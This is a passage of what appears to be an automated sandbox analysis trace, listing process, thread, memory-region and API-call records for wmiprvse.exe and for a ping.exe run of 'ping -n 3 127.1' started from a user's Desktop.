0x7d0 Thread: id = 128 os_tid = 0x7cc Thread: id = 129 os_tid = 0x7b4 Thread: id = 130 os_tid = 0x788 Thread: id = 131 os_tid = 0x784 Thread: id = 132 os_tid = 0x75c Thread: id = 133 os_tid = 0x74c Thread: id = 134 os_tid = 0x73c Thread: id = 135 os_tid = 0x734 Thread: id = 136 os_tid = 0x6d8 Thread: id = 137 os_tid = 0x6d4 Thread: id = 138 os_tid = 0x694 Thread: id = 139 os_tid = 0x670 Thread: id = 140 os_tid = 0x55c Thread: id = 141 os_tid = 0x484 Thread: id = 142 os_tid = 0x480 Thread: id = 143 os_tid = 0x470 Thread: id = 144 os_tid = 0x45c Thread: id = 145 os_tid = 0x430 Thread: id = 146 os_tid = 0x100 Thread: id = 147 os_tid = 0x3d0 Thread: id = 148 os_tid = 0x3a8 Thread: id = 149 os_tid = 0x280 Thread: id = 150 os_tid = 0x27c Thread: id = 151 os_tid = 0x248 Thread: id = 152 os_tid = 0x244 Thread: id = 153 os_tid = 0x224 Thread: id = 154 os_tid = 0x138 Thread: id = 155 os_tid = 0x1ec Thread: id = 156 os_tid = 0x3b0 Thread: id = 157 os_tid = 0x3ac Thread: id = 158 os_tid = 0x36c Thread: id = 159 os_tid = 0x364 Thread: id = 160 os_tid = 0x354 Thread: id = 161 os_tid = 0x350 Thread: id = 162 os_tid = 0x340 Thread: id = 163 os_tid = 0x328 Thread: id = 164 os_tid = 0x4dc Thread: id = 165 os_tid = 0x4d0 Thread: id = 166 os_tid = 0x960 Thread: id = 167 os_tid = 0x920 Thread: id = 313 os_tid = 0xacc Process: id = "52" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x11eb1000" os_pid = "0xa8c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "51" os_parent_pid = "0x324" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00054a92" [0xc000000f] Region: id = 2807 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2808 start_va = 0x5c0f7a0000 end_va = 0x5c0f7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0f7a0000" filename = "" Region: id = 2809 start_va = 0x5c0f7b0000 end_va = 0x5c0f7b6fff entry_point = 0x0 region_type = private name = "private_0x0000005c0f7b0000" filename = "" Region: id = 2810 start_va = 0x5c0f7c0000 end_va = 0x5c0f7cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0f7c0000" filename = "" Region: id = 2811 start_va = 0x5c0f7d0000 end_va = 0x5c0f84ffff entry_point = 0x0 region_type = private name = "private_0x0000005c0f7d0000" filename = "" Region: id = 2812 start_va = 0x5c0f850000 end_va = 0x5c0f853fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0f850000" filename = "" Region: id = 2813 start_va = 0x5c0f860000 end_va = 0x5c0f860fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0f860000" filename = "" Region: id = 2814 start_va = 0x5c0f870000 end_va = 0x5c0f871fff entry_point = 0x0 region_type = private name = "private_0x0000005c0f870000" filename = "" Region: id = 2815 start_va = 0x5c0f880000 end_va = 0x5c0f8fdfff entry_point = 0x5c0f880000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2816 start_va = 0x5c0f900000 end_va = 0x5c0f9fffff entry_point = 0x0 region_type = private name = "private_0x0000005c0f900000" filename = "" Region: id = 2817 start_va = 0x5c0fa00000 end_va = 0x5c0fa06fff entry_point = 0x0 region_type = private name = "private_0x0000005c0fa00000" filename = "" Region: id = 2818 start_va = 0x5c0fa10000 end_va = 0x5c0fb97fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0fa10000" filename = "" Region: id = 2819 start_va = 0x5c0fba0000 end_va = 0x5c0fbaffff entry_point = 0x0 region_type = private name = "private_0x0000005c0fba0000" filename = "" Region: id = 2820 start_va = 0x5c0fbb0000 end_va = 0x5c0fe84fff entry_point = 0x5c0fbb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2821 start_va = 0x5c0fe90000 end_va = 0x5c10010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c0fe90000" filename = "" Region: id = 2822 start_va = 0x5c10020000 end_va = 0x5c100dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c10020000" filename = "" Region: id = 2823 start_va = 0x5c100e0000 end_va = 0x5c100e0fff entry_point = 0x0 region_type = private name = "private_0x0000005c100e0000" filename = "" Region: id = 2824 start_va = 0x5c100f0000 end_va = 0x5c100f0fff entry_point = 0x0 region_type = private name = "private_0x0000005c100f0000" filename = "" Region: id = 2825 start_va = 0x5c10100000 end_va = 0x5c10102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c10100000" filename = "" Region: id = 2826 start_va = 0x5c10110000 end_va = 0x5c10110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c10110000" filename = "" Region: id = 2827 start_va = 0x5c10120000 end_va = 0x5c10124fff entry_point = 0x5c10120000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2828 start_va = 0x5c10130000 end_va = 0x5c10130fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c10130000" filename = "" Region: id = 2829 start_va = 0x5c10140000 end_va = 0x5c101bffff entry_point = 0x0 region_type = private name = "private_0x0000005c10140000" filename = "" Region: id = 2830 start_va = 0x5c101c0000 end_va = 0x5c102bffff entry_point = 0x0 region_type = private name = "private_0x0000005c101c0000" filename = "" Region: id = 2831 start_va = 0x5c102c0000 end_va = 0x5c102c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c102c0000" filename = "" Region: id = 2832 start_va = 0x5c102d0000 end_va = 0x5c102d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000005c102d0000" filename = "" Region: id = 2833 start_va = 0x5c102e0000 end_va = 0x5c1035ffff entry_point = 0x0 region_type = private name = "private_0x0000005c102e0000" filename = "" Region: id = 2834 start_va = 0x5c10360000 end_va = 0x5c103dffff entry_point = 0x0 region_type = private name = "private_0x0000005c10360000" filename = "" Region: id = 2835 start_va = 0x5c103e0000 end_va = 0x5c1045ffff entry_point = 0x0 region_type = private name = "private_0x0000005c103e0000" filename = "" Region: id = 2836 start_va = 0x5c10460000 end_va = 0x5c104dffff entry_point = 0x0 region_type = private name = "private_0x0000005c10460000" filename = "" Region: id = 2837 start_va = 0x5c104e0000 end_va = 0x5c1055ffff entry_point = 0x0 region_type = private name = "private_0x0000005c104e0000" filename = "" Region: id = 2838 start_va = 0x7ff751c9c000 end_va = 0x7ff751c9dfff entry_point = 0x0 region_type = private name = "private_0x00007ff751c9c000" filename = "" Region: id = 2839 start_va = 0x7ff751c9e000 end_va = 0x7ff751c9ffff entry_point = 0x0 region_type = private name = "private_0x00007ff751c9e000" filename = "" Region: id = 2840 start_va = 0x7ff751ca0000 end_va = 0x7ff751d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff751ca0000" filename = "" Region: id = 2841 start_va = 0x7ff751da0000 end_va = 0x7ff751dc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff751da0000" filename = "" Region: id = 2842 start_va = 0x7ff751dc4000 end_va = 0x7ff751dc5fff entry_point = 0x0 region_type = private name = "private_0x00007ff751dc4000" filename = "" Region: id = 2843 start_va = 0x7ff751dc6000 end_va = 0x7ff751dc7fff entry_point = 0x0 region_type = private name = "private_0x00007ff751dc6000" filename = "" Region: id = 2844 start_va = 0x7ff751dc8000 end_va = 0x7ff751dc9fff entry_point = 0x0 region_type = private name = "private_0x00007ff751dc8000" filename = "" Region: id = 2845 start_va = 0x7ff751dca000 end_va = 0x7ff751dcbfff entry_point = 0x0 region_type = private name = "private_0x00007ff751dca000" filename = "" Region: id = 2846 start_va = 0x7ff751dcc000 end_va = 0x7ff751dccfff entry_point = 0x0 region_type = private name = "private_0x00007ff751dcc000" filename = "" Region: id = 2847 start_va = 0x7ff751dce000 end_va = 0x7ff751dcffff entry_point = 0x0 region_type = private name = "private_0x00007ff751dce000" filename = "" Region: id = 2848 start_va = 0x7ff7527a0000 end_va = 0x7ff752817fff entry_point = 0x7ff7527a0000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 2849 start_va = 0x7ffb0dd70000 end_va = 0x7ffb0dd84fff entry_point = 0x7ffb0dd70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2850 start_va = 0x7ffb0df10000 end_va = 0x7ffb0df23fff entry_point = 0x7ffb0df10000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2851 start_va = 0x7ffb0df30000 end_va = 0x7ffb0e013fff entry_point = 0x7ffb0df30000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2852 start_va = 0x7ffb0e1c0000 end_va = 0x7ffb0e1cefff entry_point = 0x7ffb0e1c0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2853 start_va = 0x7ffb11730000 end_va = 0x7ffb117aefff entry_point = 0x7ffb11730000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2854 start_va = 0x7ffb19920000 end_va = 0x7ffb19929fff entry_point = 0x7ffb19920000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2855 start_va = 0x7ffb19f50000 end_va = 0x7ffb19f84fff entry_point = 0x7ffb19f50000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2856 start_va = 0x7ffb1a310000 end_va = 0x7ffb1a32dfff entry_point = 0x7ffb1a310000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2857 start_va = 0x7ffb1a540000 end_va = 0x7ffb1a565fff entry_point = 0x7ffb1a540000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2858 start_va = 0x7ffb1a860000 end_va = 0x7ffb1a8bffff entry_point = 0x7ffb1a860000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2859 start_va = 0x7ffb1a9c0000 end_va = 0x7ffb1a9c9fff entry_point = 0x7ffb1a9c0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2860 start_va = 0x7ffb1ada0000 end_va = 0x7ffb1aeaffff entry_point = 0x7ffb1ada0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2861 start_va = 0x7ffb1af60000 end_va = 0x7ffb1b006fff entry_point = 0x7ffb1af60000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2862 start_va = 0x7ffb1b010000 end_va = 0x7ffb1b067fff entry_point = 0x7ffb1b010000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2863 start_va = 0x7ffb1b070000 end_va = 0x7ffb1b126fff entry_point = 0x7ffb1b070000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2864 start_va = 0x7ffb1b140000 end_va = 0x7ffb1b279fff entry_point = 0x7ffb1b140000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2865 start_va = 0x7ffb1b280000 end_va = 0x7ffb1b288fff entry_point = 0x7ffb1b280000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2866 start_va = 0x7ffb1b410000 end_va = 0x7ffb1b580fff entry_point = 0x7ffb1b410000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2867 start_va = 0x7ffb1b870000 end_va = 0x7ffb1ba45fff entry_point = 0x7ffb1b870000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2868 start_va = 0x7ffb1ba50000 end_va = 0x7ffb1baa6fff entry_point = 0x7ffb1ba50000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2869 start_va = 0x7ffb1cef0000 end_va = 0x7ffb1cf94fff entry_point = 0x7ffb1cef0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2870 start_va = 0x7ffb1cfa0000 end_va = 0x7ffb1d043fff entry_point = 0x7ffb1cfa0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2871 start_va = 0x7ffb1d450000 end_va = 0x7ffb1d594fff entry_point = 0x7ffb1d450000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2872 start_va = 0x7ffb1d5a0000 end_va = 0x7ffb1d6d5fff entry_point = 0x7ffb1d5a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2873 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2874 start_va = 0x5c10560000 end_va = 0x5c105dffff entry_point = 0x0 region_type = private name = "private_0x0000005c10560000" filename = "" Region: id = 2875 start_va = 0x7ff751c9a000 end_va = 0x7ff751c9bfff entry_point = 0x0 region_type = private name = "private_0x00007ff751c9a000" filename = "" Region: id = 2876 start_va = 0x7ffb0dee0000 end_va = 0x7ffb0df03fff entry_point = 0x7ffb0dee0000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2877 start_va = 0x7ffb0b040000 end_va = 0x7ffb0b08cfff entry_point = 0x7ffb0b040000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 2878 start_va = 0x7ffb0b910000 end_va = 0x7ffb0bacafff entry_point = 0x7ffb0b910000 region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 2879 start_va = 0x7ffb1a830000 end_va = 0x7ffb1a85afff entry_point = 0x7ffb1a830000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2880 start_va = 0x7ffb1a9f0000 end_va = 0x7ffb1aa34fff entry_point = 0x7ffb1a9f0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2881 start_va = 0x5c105e0000 end_va = 0x5c1065ffff entry_point = 0x0 region_type = private name = "private_0x0000005c105e0000" filename = "" Region: id = 2882 start_va = 0x7ff751c98000 end_va = 0x7ff751c99fff entry_point = 0x0 region_type = private name = "private_0x00007ff751c98000" filename = "" Region: id = 2883 start_va = 0x7ffb0ed10000 end_va = 0x7ffb0ed1cfff entry_point = 0x7ffb0ed10000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Thread: id = 168 os_tid = 0x2d4 Thread: id = 169 os_tid = 0xa2c Thread: id = 170 os_tid = 0x9fc Thread: id = 171 os_tid = 0x6dc Thread: id = 172 os_tid = 0xa0c Thread: id = 173 os_tid = 0x7ec Thread: id = 174 os_tid = 0x7d4 Thread: id = 175 os_tid = 0x9ec Thread: id = 176 os_tid = 0x7dc Thread: id = 177 os_tid = 0x768 Thread: id = 436 os_tid = 0x1d4 Process: id = "53" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x2258b000" os_pid = "0x7f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2885 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 2886 start_va = 0xa10000 end_va = 0xa2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 2887 start_va = 0xa30000 end_va = 0xa31fff entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 2888 start_va = 0xa40000 end_va = 0xa4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a40000" filename = "" Region: id = 2889 start_va = 0xa50000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2890 start_va = 0xa90000 end_va = 0xacffff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2891 start_va = 0xad0000 end_va = 0xad3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 2892 start_va = 0xae0000 end_va = 0xae0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 2893 start_va = 0xaf0000 end_va = 0xaf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 2894 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2895 start_va = 0x7e840000 end_va = 0x7e862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e840000" filename = "" Region: id = 2896 start_va = 0x7e86b000 end_va = 0x7e86bfff entry_point = 0x0 region_type = private name = "private_0x000000007e86b000" filename = "" Region: id = 2897 start_va = 0x7e86c000 end_va = 0x7e86efff entry_point = 0x0 region_type = private name = "private_0x000000007e86c000" filename = "" Region: id = 2898 start_va = 0x7e86f000 end_va = 0x7e86ffff entry_point = 0x0 region_type = private name = "private_0x000000007e86f000" filename = "" Region: id = 2899 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2900 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2901 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2902 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 2903 start_va = 0xb90000 end_va = 0xb9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 2904 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2905 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2906 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2907 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a10000" filename = "" Region: id = 2908 start_va = 0xa20000 end_va = 0xa23fff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 2909 start_va = 0xb00000 end_va = 0xb7dfff entry_point = 0xb00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2910 start_va = 0xc20000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 2911 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 2912 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 2913 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2914 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2915 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2916 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2917 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2918 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2919 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2920 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2921 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2922 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 2923 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2924 start_va = 0x7e740000 end_va = 0x7e83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e740000" filename = "" Region: id = 2925 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 2926 start_va = 0xbe0000 end_va = 0xc1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2927 start_va = 0x7e868000 end_va = 0x7e86afff entry_point = 0x0 region_type = private name = "private_0x000000007e868000" filename = "" Region: id = 2928 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 2929 start_va = 0xa30000 end_va = 0xa32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2930 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 2931 start_va = 0xd20000 end_va = 0xd22fff entry_point = 0xd20000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 2932 start_va = 0xd30000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 2933 start_va = 0xd70000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 2934 start_va = 0x7e865000 end_va = 0x7e867fff entry_point = 0x0 region_type = private name = "private_0x000000007e865000" filename = "" Thread: id = 178 os_tid = 0x71c [0073.253] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0073.253] __set_app_type (_Type=0x1) [0073.253] __p__fmode () returned 0x76ea1768 [0073.253] __p__commode () returned 0x76ea176c [0073.253] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0073.254] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0073.254] SetThreadUILanguage (LangId=0x0) returned 0x409 [0073.255] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0073.255] _fileno (_File=0x76ea4c28) returned 1 [0073.255] _get_osfhandle (_FileHandle=1) returned 0x28 [0073.255] GetFileType (hFile=0x28) returned 0x2 [0073.255] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xacf398 | out: lpMode=0xacf398) returned 0 [0073.256] GetLastError () returned 0x6 [0073.256] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xacf2fc, 